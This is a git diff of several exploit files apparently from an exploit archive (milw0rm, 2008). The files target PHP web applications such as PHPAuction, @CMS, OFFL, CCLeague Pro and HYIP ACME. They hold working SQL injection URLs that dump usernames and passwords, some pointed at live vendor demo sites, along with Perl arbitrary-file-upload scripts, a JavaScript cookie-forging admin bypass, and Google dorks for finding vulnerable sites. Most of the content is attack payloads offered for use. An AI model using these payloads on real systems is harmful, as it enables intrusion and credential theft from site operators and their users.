+http://www.emusoft.org/index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users-- +################################################## ######################## +www.1923turk.org +turkish-warriorr@hotmail.com + +# milw0rm.com [2008-06-20] diff --git a/platforms/php/webapps/5879.txt b/platforms/php/webapps/5879.txt index 84de0f212..30d885107 100755 --- a/platforms/php/webapps/5879.txt +++ b/platforms/php/webapps/5879.txt 
@@ -1,56 +1,56 @@ -######################################################################### -#################### Viva IslaM Viva IslaM ############################## -## -## Remote SQL Injection Vulnerability -## -## PHPAuction ( profile.php user_id ) -## -######################################################################### -######################################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM -## -## Email : SQL@Hotmail.it -## -## !! SYRIAN HaCkErS !! -######################## -######################## -## -## Script : PHPAuction -## -## site : www.phpauctions.info -## -######################## -######################## -## -## D0rk1 : allinurl: "profile.php?user_id" auction_id -## -## D0rk2 : allinurl: "active_auctions.php" user_id -## -## -(:: SQL ::)- -## -## www.site.com/ -## profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/* -## -## -(:: L!VE DEMO ::)- -## -## http://phpauctions.info/phpauction/demo/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/* -## -## http://phpauctions.info/phpauction/demo/viewfaqs.php?cat=null -####################### -####################### - -(:: Note ::)- -This script not >> (( phpAuction GPL )) (( password Md5 )) - -####################################################################################################### -####################################################################################################### - - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-06-20] +######################################################################### +#################### Viva IslaM Viva IslaM ############################## +## +## Remote SQL Injection Vulnerability +## +## PHPAuction ( profile.php user_id ) +## +######################################################################### +######################################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM +## +## Email : SQL@Hotmail.it +## +## !! SYRIAN HaCkErS !! +######################## +######################## +## +## Script : PHPAuction +## +## site : www.phpauctions.info +## +######################## +######################## +## +## D0rk1 : allinurl: "profile.php?user_id" auction_id +## +## D0rk2 : allinurl: "active_auctions.php" user_id +## +## -(:: SQL ::)- +## +## www.site.com/ +## profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/* +## +## -(:: L!VE DEMO ::)- +## +## http://phpauctions.info/phpauction/demo/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/* +## +## http://phpauctions.info/phpauction/demo/viewfaqs.php?cat=null +####################### +####################### + -(:: Note ::)- +This script not >> (( phpAuction GPL )) (( password Md5 )) + +####################################################################################################### +####################################################################################################### + + -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-06-20] diff --git a/platforms/php/webapps/5880.txt b/platforms/php/webapps/5880.txt index ffb3cd55f..fd2117d4c 100755 --- a/platforms/php/webapps/5880.txt +++ b/platforms/php/webapps/5880.txt 
@@ -1,60 +1,60 @@ -=========================================================== - SiteXS CMS (Upload/XSS) Multiple Remote Vulnerabilities -=========================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 21 June 2008 -SITE : www.citec.us - - -##################################################### - APPLICATION : SiteXS CMS - VERSION : 0.1.1 - DOWNLOAD : http://downloads.sourceforge.net/sitexs -##################################################### - ----Arbitrary File Upload Exploit--- - - This Vulnerability can upload malicious files direct to web server. - -[Login as user] - -[+] Upload Path: http://[Target]/adm/?chid=4 - -[+] Shell Script: http://[Target]/download/[Evil File] - - ---- Remote XSS Exploit --- - -------------- - POC Exploit -------------- - -[+] POST http://192.168.24.25/adm/ HTTP/1.0 -[+] Accept: */* -[+] Content-Type: application/x-www-form-urlencoded -[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) -[+] Host: 192.168.24.25 -[+] Content-Length: 44 -[+] Cookie: PHPSESSID=aa2ded55802cd2b6fe7c304258d858f5 -[+] -[+] user=admin'&pass=test - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-06-21] +=========================================================== + SiteXS CMS (Upload/XSS) Multiple Remote Vulnerabilities +=========================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 21 June 2008 +SITE : www.citec.us + + +##################################################### + APPLICATION : SiteXS CMS + VERSION : 0.1.1 + DOWNLOAD : http://downloads.sourceforge.net/sitexs +##################################################### + +---Arbitrary File Upload Exploit--- + + This Vulnerability can upload malicious files direct to web server. + +[Login as user] + +[+] Upload Path: http://[Target]/adm/?chid=4 + +[+] Shell Script: http://[Target]/download/[Evil File] + + +--- Remote XSS Exploit --- + +------------- + POC Exploit +------------- + +[+] POST http://192.168.24.25/adm/ HTTP/1.0 +[+] Accept: */* +[+] Content-Type: application/x-www-form-urlencoded +[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) +[+] Host: 192.168.24.25 +[+] Content-Length: 44 +[+] Cookie: PHPSESSID=aa2ded55802cd2b6fe7c304258d858f5 +[+] +[+] user=admin'&pass=test + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-06-21] diff --git a/platforms/php/webapps/5881.txt b/platforms/php/webapps/5881.txt index cbeef101d..621879776 100755 --- a/platforms/php/webapps/5881.txt +++ b/platforms/php/webapps/5881.txt 
@@ -1,48 +1,48 @@ -######################################################################### -#################### Viva IslaM Viva IslaM ############################## -## -## Remote SQL Injection Vulnerability -## -## @CMS 2.1.1 ( readarticle.php article_id ) -## -######################################################################### -######################################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM -## -## Email : SQL@Hotmail.it -## -## !! SYRIAN HaCkErS !! -######################## -######################## -## -## Script : @CMS 2.1.1 -## -## site : www.atcode.net -## -######################## -######################## -## -(:: SQL ::)- -## -## www.site.de/readarticle.php?article_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/* -## -## and -## -## www.site.com/articles.php?cat_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/* -## -####################### -####################### - - -####################################################################################################### -####################################################################################################### - - -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-06-21] +######################################################################### +#################### Viva IslaM Viva IslaM ############################## +## +## Remote SQL Injection Vulnerability +## +## @CMS 2.1.1 ( readarticle.php article_id ) +## +######################################################################### +######################################################################### +## +## AuTh0r : Mr.SQL +## +## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ATsDp.CoM +## +## Email : SQL@Hotmail.it +## +## !! SYRIAN HaCkErS !! +######################## +######################## +## +## Script : @CMS 2.1.1 +## +## site : www.atcode.net +## +######################## +######################## +## -(:: SQL ::)- +## +## www.site.de/readarticle.php?article_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/* +## +## and +## +## www.site.com/articles.php?cat_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/* +## +####################### +####################### + + +####################################################################################################### +####################################################################################################### + + -(:: !Gr3E3E3E3E3E3E3TzZ! 
::)- + + :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MuslimS HaCkErS :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-06-21] diff --git a/platforms/php/webapps/5882.txt b/platforms/php/webapps/5882.txt index 2bd51088a..d20859a40 100755 --- a/platforms/php/webapps/5882.txt +++ b/platforms/php/webapps/5882.txt 
@@ -1,29 +1,29 @@ -eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability - - -Author: iLker Kandemir [MEFISTO] - -Script download : http://www.hotscripts.com/Detailed/81086.html - -script demo : http://emvvy.com/demos/enews/ - -site : www.dumenci.net - ----------------------------------------------------------------- -//poc: - -if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) { - $deleteSQL = sprintf("DELETE FROM news WHERE id=%s", - GetSQLValueString($_GET['delete'], "int")); - ----------------------------------------------------------------- - -//exploit : - -http://[site]/delete.php?delete=[eNews_id] - ----------------------------------------------------------------- - -tnx : aLL my FriEndZ - -# milw0rm.com [2008-06-21] +eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability + + +Author: iLker Kandemir [MEFISTO] + +Script download : http://www.hotscripts.com/Detailed/81086.html + +script demo : http://emvvy.com/demos/enews/ + +site : www.dumenci.net + +---------------------------------------------------------------- +//poc: + +if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) { + $deleteSQL = sprintf("DELETE FROM news WHERE id=%s", + GetSQLValueString($_GET['delete'], "int")); + +---------------------------------------------------------------- + +//exploit : + +http://[site]/delete.php?delete=[eNews_id] + +---------------------------------------------------------------- + +tnx : aLL my FriEndZ + +# milw0rm.com [2008-06-21] diff --git a/platforms/php/webapps/5883.txt b/platforms/php/webapps/5883.txt index 6c2c8a18f..17c6c7a56 100755 --- a/platforms/php/webapps/5883.txt +++ b/platforms/php/webapps/5883.txt 
@@ -1,41 +1,41 @@ -######################################################################### -#################### PROUD TO BE MUSLIM ############################## -## -## Remote SQL Injection Vulnerability -## -## Knowledge Base Software Overview ( index.php cat_id ) -## -######################################################################### -######################################################################### -## -## AuTh0r : S.L TEAM ( FA6@L 3RROR --- H3B@R13H) -## -## H0ME : WwW.MALAKSOFT.CoM - -######################## -######################## -## -## Script : Knowledge Base Software Overview -## -## site : www.kblance.com -## -######################## -######################## - ## -(:: SQL ::)- - -## www.site.com/ -## index.php?main=comment&sub=index&view=&qid=3&cat_id=-3+union+select+1,concat_ws(0x3a3a,uname,pwd),3,4,5,6,7,8,9,10+from+user/* -## -## -(:: L!VE DEMO ::)- -## -## http://www.kblance.com/demo/index.php?main=comment&sub=index&view=&qid=3&cat_id=-3+union+select+1,concat_ws(0x3a3a,uname,pwd),3,4,5,6,7,8,9,10+from+user/* -####################################################################################################### -####################################################################################################### - - -(:: !greetz! 
::)- - - :: MR.SQL :: BLACK CHEETAH :: GERMAYA-X :: :: MusliMs HaCkErs :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-06-21] +######################################################################### +#################### PROUD TO BE MUSLIM ############################## +## +## Remote SQL Injection Vulnerability +## +## Knowledge Base Software Overview ( index.php cat_id ) +## +######################################################################### +######################################################################### +## +## AuTh0r : S.L TEAM ( FA6@L 3RROR --- H3B@R13H) +## +## H0ME : WwW.MALAKSOFT.CoM + +######################## +######################## +## +## Script : Knowledge Base Software Overview +## +## site : www.kblance.com +## +######################## +######################## + ## -(:: SQL ::)- + +## www.site.com/ +## index.php?main=comment&sub=index&view=&qid=3&cat_id=-3+union+select+1,concat_ws(0x3a3a,uname,pwd),3,4,5,6,7,8,9,10+from+user/* +## +## -(:: L!VE DEMO ::)- +## +## http://www.kblance.com/demo/index.php?main=comment&sub=index&view=&qid=3&cat_id=-3+union+select+1,concat_ws(0x3a3a,uname,pwd),3,4,5,6,7,8,9,10+from+user/* +####################################################################################################### +####################################################################################################### + + -(:: !greetz! ::)- + + :: MR.SQL :: BLACK CHEETAH :: GERMAYA-X :: :: MusliMs HaCkErs :: +####################################################################################################### +####################################################################################################### + +# milw0rm.com [2008-06-21] 
diff --git a/platforms/php/webapps/5886.pl b/platforms/php/webapps/5886.pl index f3ca4d6bc..bc13dc914 100755 --- a/platforms/php/webapps/5886.pl +++ b/platforms/php/webapps/5886.pl @@ -1,37 +1,37 @@ -#!/usr/bin/perl - -use strict; -use warnings; -use LWP::UserAgent; -use HTTP::Request::Common; - -print <); - -print "Enter File Path(path to local file to upload): "; - chomp(my $file=); - -my $ua = LWP::UserAgent->new; -my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php', - Content_Type => 'form-data', - Content => [ NewFile => $file ] ); - -if($re->is_success) { - if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; } - else { print "File Upload Is Disabled! Failed!\n"; } -} else { print "HTTP Request Failed!\n"; } - -exit; - -# milw0rm.com [2008-06-21] +#!/usr/bin/perl + +use strict; +use warnings; +use LWP::UserAgent; +use HTTP::Request::Common; + +print <); + +print "Enter File Path(path to local file to upload): "; + chomp(my $file=); + +my $ua = LWP::UserAgent->new; +my $re = $ua->request(POST $url.'/admin/FCKeditor/editor/filemanager/upload/php/upload.php', + Content_Type => 'form-data', + Content => [ NewFile => $file ] ); + +if($re->is_success) { + if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; } + else { print "File Upload Is Disabled! Failed!\n"; } +} else { print "HTTP Request Failed!\n"; } + +exit; + +# milw0rm.com [2008-06-21] diff --git a/platforms/php/webapps/5887.pl b/platforms/php/webapps/5887.pl index 60fb1ef28..c4f14ea00 100755 --- a/platforms/php/webapps/5887.pl +++ b/platforms/php/webapps/5887.pl 
@@ -1,47 +1,47 @@ -#!/usr/bin/perl - -use strict; -use warnings; -use LWP::UserAgent; -use HTTP::Request::Common; - -print <); - -print "\nEnter Local File Path To Upload(ie: C:\\file.txt): "; - chomp(my $file=); - -my $ext = substr $file, rindex $file, '.'; -my $fname = int rand 9999; -my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} ); - -my $re = $ua->request(POST $host . '/cms/admin/upload.php', - Content_Type => 'form-data', - Content => [ 'submit0' => 'authed', # if script reads this as TRUE then the script thinks we have already authenticated the username/password, only 0 or undef is false - 'submit' => 1, - 'password' => 1, # as long as this is true we should be able to upload - 'filename' => $fname, - 'upload' => [ $file ] ] ); - -die "Exploit Failed, HTTP Request Failed!" unless $re->is_success; - -print "File Uploaded! Location: " . $host . "/cms/images/" . $fname . $ext . "\n"; -exit; - -# milw0rm.com [2008-06-21] +#!/usr/bin/perl + +use strict; +use warnings; +use LWP::UserAgent; +use HTTP::Request::Common; + +print <); + +print "\nEnter Local File Path To Upload(ie: C:\\file.txt): "; + chomp(my $file=); + +my $ext = substr $file, rindex $file, '.'; +my $fname = int rand 9999; +my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} ); + +my $re = $ua->request(POST $host . '/cms/admin/upload.php', + Content_Type => 'form-data', + Content => [ 'submit0' => 'authed', # if script reads this as TRUE then the script thinks we have already authenticated the username/password, only 0 or undef is false + 'submit' => 1, + 'password' => 1, # as long as this is true we should be able to upload + 'filename' => $fname, + 'upload' => [ $file ] ] ); + +die "Exploit Failed, HTTP Request Failed!" unless $re->is_success; + +print "File Uploaded! Location: " . $host . "/cms/images/" . $fname . $ext . "\n"; +exit; + +# milw0rm.com [2008-06-21] 
diff --git a/platforms/php/webapps/5888.txt b/platforms/php/webapps/5888.txt index d94aceebb..f9791810e 100755 --- a/platforms/php/webapps/5888.txt +++ b/platforms/php/webapps/5888.txt 
@@ -1,91 +1,91 @@ --[*]+================================================================================+[*]- --[*]+ CCLeague Pro <= 1.2 Insecure Cookie Authentication Vulnerability +[*]- --[*]+================================================================================+[*]- - - - -[*] Discovered By: t0pP8uZz -[*] Discovered On: 19 JUNE 2008 -[*] Script Download: http://castillocentral.com/ -[*] DORK: "Powered by CCLeague Pro" (alot of sites removed dork, so find another) - - - -[*] Vendor Has Not Been Notified! - - - -[*] DESCRIPTION: - - CCLeage Pro 1.2 and all prior versions suffer from multiple insecure cookie validation vulnerabilitys. - - Lets take a look at a line from the "admin.php" file from "CCLeage Pro 1.2" - - CODE LINE 52 (admin.php): - if($_COOKIE['PHPSESSID'] == session_id( ) && $_COOKIE['type'] == "admin") { .. } - - As we can see above, the script checks to see if a cookie is set and matches a value, as we know this is very easy to bypass by creating a cookie, - but now what above the "$_COOKIE['PHPSESSID'] == session_id( )" how do we bypass this you ask? - - well in some versions this part doesnt even exist, but most hosts are running the upto date versions so we still need a way to bypass. - - anyway, the php function session_id checks/returns the PHPSESSID if any, and here it is returning the sessionid, since we havent created any session - the function will return "" (not null), so all we need to do is make our PHPSESSID match this, and since its grabbing it from a cookie thats simple. - - at the minute our PHPSESSID will be some random hash, so we can simply change this by overwriting the cookie. - - See the javascript code below in a second to successfully exploit this. 
- - Once you have run the javascript code in your browser, you will be able to visit the "admin.php" area without having to login, but now - you probarly see alot of errors, this is because the script attempts to load the admin preferences based on a cookie, since we dont have this cookie set - its pulling non-existent data from the mysql database. - - so once again we need to set another cookie which needs to contain a existing admins email address, this should be too hard to obtain from sniffing around - the site. - - here is the line of code from the admin.php which attempts to select the admin config from the db. - - CODE LINE 67 (admin.php): $admininfo = mysql_query("SELECT * FROM ".$_CONF['tprefix']."administrators WHERE contact_email = '$_COOKIE[u]' LIMIT 0,1"); - - there is also a sql injection in the above line, if magic quotes are off, so you rippers dont bother reposting that has a seperate vulnerability. - - Thats about it, Check below for the javascript code which will craft the cookies for you. - - Goodluck! - - - -[*] Vulnerability/Javascript: - - javascript:document.cookie = "type=admin; path=/"; document.cookie = "PHPSESSID=; path=/"; // this will create one cookie and null the other - javascript:document.cookie = "u=admin@domain.com; path=/"; // replace the email with a existent admin email from the site, if this isnt correct your not gona get very far. - - - -[*] NOTE/TIP: - - - Use the dork and find a site, navigate to the site, once at the site run the above javascript code (paste into your address bar), dont forget - to replace the email in the second javascript line. - - after you have done the above steps visit the admin area at "admin.php" - - - -[*] GREETZ: - - milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew ! 
- - - -[-] peace, - - t0pP8uZz - - - --[*]+================================================================================+[*]- --[*]+ CCLeague Pro <= 1.2 Insecure Cookie Authentication Vulnerability +[*]- --[*]+================================================================================+[*]- - -# milw0rm.com [2008-06-21] +-[*]+================================================================================+[*]- +-[*]+ CCLeague Pro <= 1.2 Insecure Cookie Authentication Vulnerability +[*]- +-[*]+================================================================================+[*]- + + + +[*] Discovered By: t0pP8uZz +[*] Discovered On: 19 JUNE 2008 +[*] Script Download: http://castillocentral.com/ +[*] DORK: "Powered by CCLeague Pro" (alot of sites removed dork, so find another) + + + +[*] Vendor Has Not Been Notified! + + + +[*] DESCRIPTION: + + CCLeage Pro 1.2 and all prior versions suffer from multiple insecure cookie validation vulnerabilitys. + + Lets take a look at a line from the "admin.php" file from "CCLeage Pro 1.2" + + CODE LINE 52 (admin.php): + if($_COOKIE['PHPSESSID'] == session_id( ) && $_COOKIE['type'] == "admin") { .. } + + As we can see above, the script checks to see if a cookie is set and matches a value, as we know this is very easy to bypass by creating a cookie, + but now what above the "$_COOKIE['PHPSESSID'] == session_id( )" how do we bypass this you ask? + + well in some versions this part doesnt even exist, but most hosts are running the upto date versions so we still need a way to bypass. + + anyway, the php function session_id checks/returns the PHPSESSID if any, and here it is returning the sessionid, since we havent created any session + the function will return "" (not null), so all we need to do is make our PHPSESSID match this, and since its grabbing it from a cookie thats simple. + + at the minute our PHPSESSID will be some random hash, so we can simply change this by overwriting the cookie. 
+ + See the javascript code below in a second to successfully exploit this. + + Once you have run the javascript code in your browser, you will be able to visit the "admin.php" area without having to login, but now + you probarly see alot of errors, this is because the script attempts to load the admin preferences based on a cookie, since we dont have this cookie set + its pulling non-existent data from the mysql database. + + so once again we need to set another cookie which needs to contain a existing admins email address, this should be too hard to obtain from sniffing around + the site. + + here is the line of code from the admin.php which attempts to select the admin config from the db. + + CODE LINE 67 (admin.php): $admininfo = mysql_query("SELECT * FROM ".$_CONF['tprefix']."administrators WHERE contact_email = '$_COOKIE[u]' LIMIT 0,1"); + + there is also a sql injection in the above line, if magic quotes are off, so you rippers dont bother reposting that has a seperate vulnerability. + + Thats about it, Check below for the javascript code which will craft the cookies for you. + + Goodluck! + + + +[*] Vulnerability/Javascript: + + javascript:document.cookie = "type=admin; path=/"; document.cookie = "PHPSESSID=; path=/"; // this will create one cookie and null the other + javascript:document.cookie = "u=admin@domain.com; path=/"; // replace the email with a existent admin email from the site, if this isnt correct your not gona get very far. + + + +[*] NOTE/TIP: + + + Use the dork and find a site, navigate to the site, once at the site run the above javascript code (paste into your address bar), dont forget + to replace the email in the second javascript line. + + after you have done the above steps visit the admin area at "admin.php" + + + +[*] GREETZ: + + milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew ! 
+ + + +[-] peace, + + t0pP8uZz + + + +-[*]+================================================================================+[*]- +-[*]+ CCLeague Pro <= 1.2 Insecure Cookie Authentication Vulnerability +[*]- +-[*]+================================================================================+[*]- + +# milw0rm.com [2008-06-21] diff --git a/platforms/php/webapps/5889.txt b/platforms/php/webapps/5889.txt index ab406930e..8af6b75b5 100755 --- a/platforms/php/webapps/5889.txt +++ b/platforms/php/webapps/5889.txt 
@@ -1,58 +1,58 @@ --[*]+================================================================================+[*]- --[*]+ OFFL <= 0.2.6 Remote SQL Injection Vulnerability +[*]- --[*]+================================================================================+[*]- - - - -[*] Discovered By: t0pP8uZz -[*] Discovered On: 19 JUNE 2008 -[*] Script Download: http://downloads.sourceforge.net/offl -[*] DORK: N/A - - - -[*] Vendor Has Not Been Notified! - - - -[*] DESCRIPTION: - - OFFL 0.2.6 and prior versions, suffer from multiple insecure mysql querys. - - SQL Injections below, there are various other spots which are injectable too... - - including " leagues.php?league_id=1' ", " players.php?player_id=190' " - - - -[*] SQL Injection: - -For Admin: http://site.com/teams.php?fflteam_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(username,0x3a,password)/**/FROM/**/users/**/WHERE/**/admin=1/**/LIMIT/**/0,1/* -For Users: http://site.com/teams.php?fflteam_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(username,0x3a,password)/**/FROM/**/users/**/LIMIT/**/0,1/* - - - -[*] NOTE/TIP: - - admin area is at "admin.php" login using the normal login page first. - passwords are encrypted in MD5 - - no effcient dork, sql columns may vary on some sites. - -[*] GREETZ: - - milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew ! - - - -[-] Peace... - - ...t0pP8uZz ! 
- - - --[*]+================================================================================+[*]- --[*]+ OFFL <= 0.2.6 Remote SQL Injection Vulnerability +[*]- --[*]+================================================================================+[*]- - -# milw0rm.com [2008-06-21] +-[*]+================================================================================+[*]- +-[*]+ OFFL <= 0.2.6 Remote SQL Injection Vulnerability +[*]- +-[*]+================================================================================+[*]- + + + +[*] Discovered By: t0pP8uZz +[*] Discovered On: 19 JUNE 2008 +[*] Script Download: http://downloads.sourceforge.net/offl +[*] DORK: N/A + + + +[*] Vendor Has Not Been Notified! + + + +[*] DESCRIPTION: + + OFFL 0.2.6 and prior versions, suffer from multiple insecure mysql querys. + + SQL Injections below, there are various other spots which are injectable too... + + including " leagues.php?league_id=1' ", " players.php?player_id=190' " + + + +[*] SQL Injection: + +For Admin: http://site.com/teams.php?fflteam_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(username,0x3a,password)/**/FROM/**/users/**/WHERE/**/admin=1/**/LIMIT/**/0,1/* +For Users: http://site.com/teams.php?fflteam_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(username,0x3a,password)/**/FROM/**/users/**/LIMIT/**/0,1/* + + + +[*] NOTE/TIP: + + admin area is at "admin.php" login using the normal login page first. + passwords are encrypted in MD5 + + no effcient dork, sql columns may vary on some sites. + +[*] GREETZ: + + milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew ! + + + +[-] Peace... + + ...t0pP8uZz ! + + + +-[*]+================================================================================+[*]- +-[*]+ OFFL <= 0.2.6 Remote SQL Injection Vulnerability +[*]- +-[*]+================================================================================+[*]- + +# milw0rm.com [2008-06-21] 
diff --git a/platforms/php/webapps/5890.txt b/platforms/php/webapps/5890.txt index bfdfb2a3c..7ff4fcceb 100755 --- a/platforms/php/webapps/5890.txt +++ b/platforms/php/webapps/5890.txt 
@@ -1,59 +1,59 @@ -######################################################## -# -# HYIP ACME Version SQL Injection Vulnerability -#======================================================== -# Author: Hussin X = -# = -# Home : www.tryag.cc/cc = -# = -# email: darkangel_g85[at]Yahoo[DoT]com = -# hussin.x[at]hotmail[DoT]com = -# = -#======================================================== -# HomE script : http://www.ajsquare.com/ -# -# Demo : http://www.ajhyip.com/demo/acme/index.php -# -# -# DorK : Copyright Acme 2008 -# -# -########################################################## - -Exploit: - - -http://www.site.com/[PaTs]/news.php?id=-1+union+select+null,null,concat_ws - -(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin - --- - - - -L!VE DEMO: - -http://www.ajhyip.com/demo/acme/news.php?id=-1+union+select+null,null,concat_ws - -(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin - --- - - -LogiN: - -admin/index.php - - -################################################################################ -####################################( Greetz )################################## -# # -# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # - -# Silic0n / Rafi / FAHD / Iraqihack # - -# # -#################################(and All IRAQIs)############################### -################################################################################ - -# milw0rm.com [2008-06-21] +######################################################## +# +# HYIP ACME Version SQL Injection Vulnerability +#======================================================== +# Author: Hussin X = +# = +# Home : www.tryag.cc/cc = +# = +# email: darkangel_g85[at]Yahoo[DoT]com = +# hussin.x[at]hotmail[DoT]com = +# = +#======================================================== +# HomE script : http://www.ajsquare.com/ +# +# Demo : http://www.ajhyip.com/demo/acme/index.php +# +# +# DorK : Copyright Acme 2008 +# +# 
+########################################################## + +Exploit: + + +http://www.site.com/[PaTs]/news.php?id=-1+union+select+null,null,concat_ws + +(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin + +-- + + + +L!VE DEMO: + +http://www.ajhyip.com/demo/acme/news.php?id=-1+union+select+null,null,concat_ws + +(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin + +-- + + +LogiN: + +admin/index.php + + +################################################################################ +####################################( Greetz )################################## +# # +# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # + +# Silic0n / Rafi / FAHD / Iraqihack # + +# # +#################################(and All IRAQIs)############################### +################################################################################ + +# milw0rm.com [2008-06-21] diff --git a/platforms/php/webapps/5892.txt b/platforms/php/webapps/5892.txt index e049d13eb..be5018b45 100755 --- a/platforms/php/webapps/5892.txt +++ b/platforms/php/webapps/5892.txt 
@@ -1,49 +1,49 @@ -######################################################### -# -# phpauction-gpl Version3.2 Version SQL Injection Vulnerability -#======================================================== -# Author: Hussin X = -# = -# Home : www.tryag.cc/cc = -# = -# email: darkangel_g85[at]Yahoo[DoT]com = -# hussin.x[at]hotmail[DoT]com = -# = -#======================================================== -# HomE script : http://www.phpauction.net -# -# Demo : http://www.phpauction.net/phpauction-gpl-3.2/ -# -# -# DorK : Copyright 2007, PHPAUCTION.NET -# -# -########################################################## - -Exploit: - - -http://www.site.net/[Pats]/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers-- - - - -L!VE DEMO: - -http://www.phpauction.net/phpauction-gpl-3.2/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers-- - - -LogiN: - -admin/index.php - - -################################################################################ -####################################( Greetz )################################## -# # -# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke # -# Silic0n / Rafi / FAHD / Iraqihack # -# # -#################################(and All IRAQIs)############################### -################################################################################ - -# milw0rm.com [2008-06-21] +######################################################### +# +# phpauction-gpl Version3.2 Version SQL Injection Vulnerability +#======================================================== +# Author: Hussin X = +# = +# Home : www.tryag.cc/cc = +# = +# email: 